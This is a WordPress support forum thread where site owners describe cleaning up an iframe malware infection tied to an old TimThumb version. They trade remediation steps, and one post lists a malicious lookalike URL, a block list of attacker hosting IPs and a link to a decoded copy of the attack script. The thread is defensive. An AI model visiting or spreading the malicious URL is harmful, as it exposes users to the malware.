[TimThumb Vulnerability] iframe hack

You do not need to wipe your site.

Make sure you set the WP-config up correctly. You need to have the database info the same, with the same prefix and everything.

I had the same problem. Maybe it come from an old version of Timthumb :

https://www.websitedefender.com/web-security/timthumb-vulnerability-wordpress-plugins-themes/

I use The Dawn for my website. I change the timthumb.php to put the new version.
I’ve also check the wp-config.php file and removed the code.

It’s working now (without uploading a fresh version of WordPress). Wahtever, I will upload a fresh version of WordPress, just to be sure.

Hello everyone. I got this malware on all my sites running on webhostingpad servers a few days back. Even fresh wordpress installations that I did using the cpanel software Softaculous had this malware. I suspect the malware is probably in the softaculous software of my hosting company.

Anyway, I have successfully removed the malware following the below steps (which were mentioned by some previous users already) which did not require a completely fresh installations of wordpress.

Step 1) Run a scan on https://sitecheck.sucuri.net/scanner/

Step 2) It showed me an error in 2 javascript files in wp-includes

Step 3) Take a backup of wp-includes and then delete the folder

Step 4) Download wordpress from www.remarpro.com

Step 5) Copy wp-includes from this fresh copy to the appropriate location in your server.

In one of the installations, there was a malware detected in this plugin called front-slider. It was in the jquery file. I downloaded a fresh copy of front-slider and deleted the existing jquery file on the server and then copied the file from the fresh download.

Step 6) Open a new browser and run the scan of your website again on https://sitecheck.sucuri.net/scanner/. Hopefully it should not detect any more malware.

Step 7) Change your hosting/cpanel passwords, wp-admin passwords

Step 8) In case you are using chrome, clear your browsing history and everything (or perhaps open an incognito window). Open your website and it should open just fine.

I got the same malware notice from chrome minutes ago. One month ago, I transferred to a different host and this is the first time the site got struck with malware.

And yes, wp-config-.php has all those “extras” code in it. I deleted it and nothing changed.

Luckily, I had made a backup (using xcloner) 2 weeks ago. I deleted all the files, and restore the entire site. As of now, it’s working fine. I’m not sure why this happens, I kept all the plugins updated

It is ironic that my wordpress sites which I did not upgrade to the new version did not get this malware. Could it be that the new wordpress was susceptible ?

@sidgoyal1: I think it’s the hosting company who’s vulnerable. I have two sites with them, and both got the malware notice. Those hosted in another hosting were okay.

sidgoyal1 – No, it has nothing to do with your WP version.

Yup, we got the same hacks yesterday on 2 of our sites. Thanks for posting this info. We’ve done what’s shown in this thread and so far so good.

+1 for the WordPress community!

here is what i found, maybe somebody can do something about this, im just trying to help with this info

https://flickr.com.m0.sk/fcuk.php

that bogus site redirects to :

https://www.hodinky.cz/

maybe somebody can report to their host or something

what i found is that you really need to remove all external site links from your timthumb file & put a false on allow external

also block this hosting :

nsset: NSSID:VSHOSTING
nserver: ns1.vshosting.cz (78.24.8.150)
nserver: ns2.vshosting.cz (89.235.0.2)

93.185.101.245 !
188.95.124.59 !

& this is the hosting where e script came from
ns.gransy.com A 77.78.104.149
72.26.225.234
85.25.73.97
79.172.193.112
74.220.215.87 !

That fcuk.php is a lengthy script. I’ve decoded it and put the results at PasteBin:

https://pastebin.com/KJ6nhfCp

It looks like some more encoded code around line 1602. I’ll have to look at that later.

I know the last post was over 3 days ago but just to inform, I went a head and used the old database after deleting the WordPress files and keeping the upload directory, etc.

My site is clean of infection. Just do as Ipstenu said and you’ll be fine. Try not to over complicate it, simply follow the instructions layed out and you’ll be back to green meadows in no time.

The only thing different that I did was deleted the old database user (and consequently removed the permissions) and created a new database user with a new password and added them to a NEW wp-config.php file…the last one had code injected within it. nasty stuff

The only thing different that I did was deleted the old database user (and consequently removed the permissions) and created a new database user with a new password and added them to a NEW wp-config.php file…the last one had code injected within it. nasty stuff

That’s a great call ??

Guys, just got a malware report from Securi – anyone seen this one? I assume I need to do the same as some of the above comments?

Cheers, Andy

[Code moderated as per the Forum Rules. Please use the pastebin]

andyd69 – If you’ve been hacked, yes.

At this point, we’re at 3 pages and it’s the same story, so here’s the skinny.

If you’ve been hacked by this, you need to, in addition to the normal cleanups, make sure you remove TimThumb’s susceptible version from your server.

Closing, as this will be impossible to help anyoen new.